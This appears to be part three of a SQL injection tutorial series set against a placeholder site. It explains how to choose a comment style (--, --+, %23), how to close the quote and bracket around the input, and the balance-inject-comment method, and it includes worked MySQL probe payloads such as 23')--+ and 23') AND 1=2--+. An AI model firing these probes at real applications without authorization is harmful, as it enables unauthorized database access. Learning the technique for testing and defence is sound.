Balance SQLi Query Techniques
Welcome to the third part of the basics of SQL for SQL injection. In the last part we took the URL "http://fakesite.com/report.php?id=23" as an example, assumed some basic queries by looking at the URL, tried different injections and learnt how to figure out which type of query we are facing. In this tutorial we will learn how to decide which comment type we should use and why, and how to find the number of columns. As discussed earlier, the comment types used in SQLi are the ones we try below ("--", "--+" and the URL-encoded "#").
Well, actually it depends only on the database engine behind the application and on how the application reacts when we try the commenting operators. On the usual PHP/MySQL stack, MySQL only treats "--" as a comment when whitespace follows it, and a trailing space is stripped from the URL, so "--+" (the "+" is decoded to a space) is what usually works; "#" has to be sent URL-encoded as "%23", otherwise the browser treats it as a fragment and never sends it at all. Failing that, the best option is to try the different comment types in turn and analyse the responses. So the check we do is: close our input with every possibility (single quote, double quote, bracket, and their combinations), comment out the rest of the query, and if the page comes back as normal we can be sure that this comment is working. We will again take the same URL as an example:
"http://fakesite.com/report.php?id=23"
So let's see how we can check which comment to use.
Test for the "--" comment as described, and check all the other commenting types in the same manner; the one that gives the same output as
"http://fakesite.com/report.php?id=23"
tells you both the internal query context and the comment you can use. Now that we know how to figure out the internal query and the comment to use, let's look at the basics of injecting.
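The probing described above, as an added example that is not part of the original post. It assumes MySQL (the comment rules below are MySQL's), a table named report with an id column, and an internal query that keeps a condition after our input; none of these are given in the original, which only shows the URL. Each probe is written as the query the database receives after the web server has decoded the URL parameter, and the ones that raise a syntax error are left commented out so the script runs through.

```sql
-- Added example (not from the original post). Assumes MySQL, a table named
-- "report" and an internal query of the form
--   SELECT * FROM report WHERE id=('<input>') AND published=1
-- The trailing AND is an assumption, so that the commenting step has something to remove.
CREATE TABLE report (id INT, title VARCHAR(64), published TINYINT);
INSERT INTO report VALUES (23, 'baseline row', 1), (24, 'another row', 1);

-- Baseline: ?id=23 returns exactly one row. Every probe is compared against this.
SELECT * FROM report WHERE id=('23') AND published=1;

-- Probe 1: ?id=23'  -> the string literal is never terminated: syntax error.
-- SELECT * FROM report WHERE id=('23'') AND published=1;

-- Probe 2: ?id=23'--  -> MySQL only treats "--" as a comment when whitespace
-- follows it, and a trailing space is lost from the URL, so this is still an error.
-- SELECT * FROM report WHERE id=('23'--) AND published=1;

-- Probe 3: ?id=23'--+  -> "+" decodes to a space, so the tail is now commented out,
-- but the bracket opened by id=( is never closed: still an error.
-- SELECT * FROM report WHERE id=('23'-- ) AND published=1;

-- Probe 4: ?id=23')--+  -> quote and bracket both closed, tail commented out.
-- Same single row as the baseline, so the context is ('...') and "--+" works.
-- (The ";" sits on its own line because the comment swallows the rest of the line.)
SELECT * FROM report WHERE id=('23')-- ) AND published=1
;

-- Probe 5: ?id=23')%23  -> "#" must be URL-encoded, otherwise the browser keeps
-- it as a fragment and never sends it. Decoded, it is MySQL's "#" comment:
-- same result as probe 4.
SELECT * FROM report WHERE id=('23')# ) AND published=1
;

-- Probe 6: ?id=23")--+  -> wrong closer for this query: the double quote is just
-- another character inside the single-quoted string, which is never terminated: error.
-- SELECT * FROM report WHERE id=('23")-- ) AND published=1;
```

Only the probes whose closer matches the real context (here the single quote plus the bracket) give the baseline row back; every other combination either errors or changes the result, which is exactly the difference the check looks for.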
Wherever and whenever you are injecting, in any application,
there are the following three basic rules of injecting:
[1]. Balance.
[2]. Inject.
[3]. Commenting.
Understanding the first phase "Balance":
In this phase we balance the internal query. For example, let's say that after reading Part
1 and Part 2 we understand how to assume and figure out the internal query
used by the application where our input is injected, and we have figured out that
the internal query is "Select * from tablename where id=('23')". In this case our balance
input should be 23').
The phase of Injection:
In this phase, we inject as per our requirement, and the type of injection we are doing.
The phase of Commenting:
Then the last part is commenting, which we already know. Now check the image below,
which shows all three parts of an injection.
As per the Above Injection, we can assume the internal query to be:
So now let's start with our next phase. With the "--+" comment the SQL error is gone, so the query has been balanced successfully.
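The three phases applied to the query assumed above, as an added example that is not part of the original post. It assumes MySQL, an internal query that carries a trailing condition after our input (so that the commenting phase has something to discard), and a plain AND 1=2 / AND 1=1 pair as the injected part; the trailing condition, the injected condition and the column names are all assumptions, the page only gives "Select * from tablename where id=('23')".

```sql
-- Added example (not from the original post). Assumes MySQL and an internal query of
--   SELECT * FROM tablename WHERE id=('<input>') AND published=1
-- The trailing AND and the column names are assumptions.
CREATE TABLE tablename (id INT, title VARCHAR(64), published TINYINT);
INSERT INTO tablename VALUES (23, 'row 23', 1), (24, 'row 24', 1);

-- Baseline for ?id=23: one row.
SELECT * FROM tablename WHERE id=('23') AND published=1;

-- Payload for ?id=23') AND 1=2--+  split into the three phases:
--   [1] Balance:  23')       closes the quote and the bracket that wrap our input
--   [2] Inject:    AND 1=2   the condition we want evaluated (assumed here; it makes the WHERE false)
--   [3] Comment:  --+        "+" decodes to a space, so "-- " discards the original tail
-- Query as the database receives it (";" on its own line because the comment eats the rest of the line):
SELECT * FROM tablename WHERE id=('23') AND 1=2-- ') AND published=1
;
-- Returns no rows. Swapping the injected part for AND 1=1 returns the baseline row again:
SELECT * FROM tablename WHERE id=('23') AND 1=1-- ') AND published=1
;
-- A wrong balance (quote closed, bracket not) leaves id=( open and the query fails;
-- that failure is the "SQL error" a correct balance fixes:
-- SELECT * FROM tablename WHERE id=('23' AND 1=1-- ') AND published=1;
```

The point of the pair is that the injected condition is the only thing that changes between the two requests: balance and comment stay fixed, and the response flips between the baseline row and no row, which confirms the balance is right before anything more elaborate is injected.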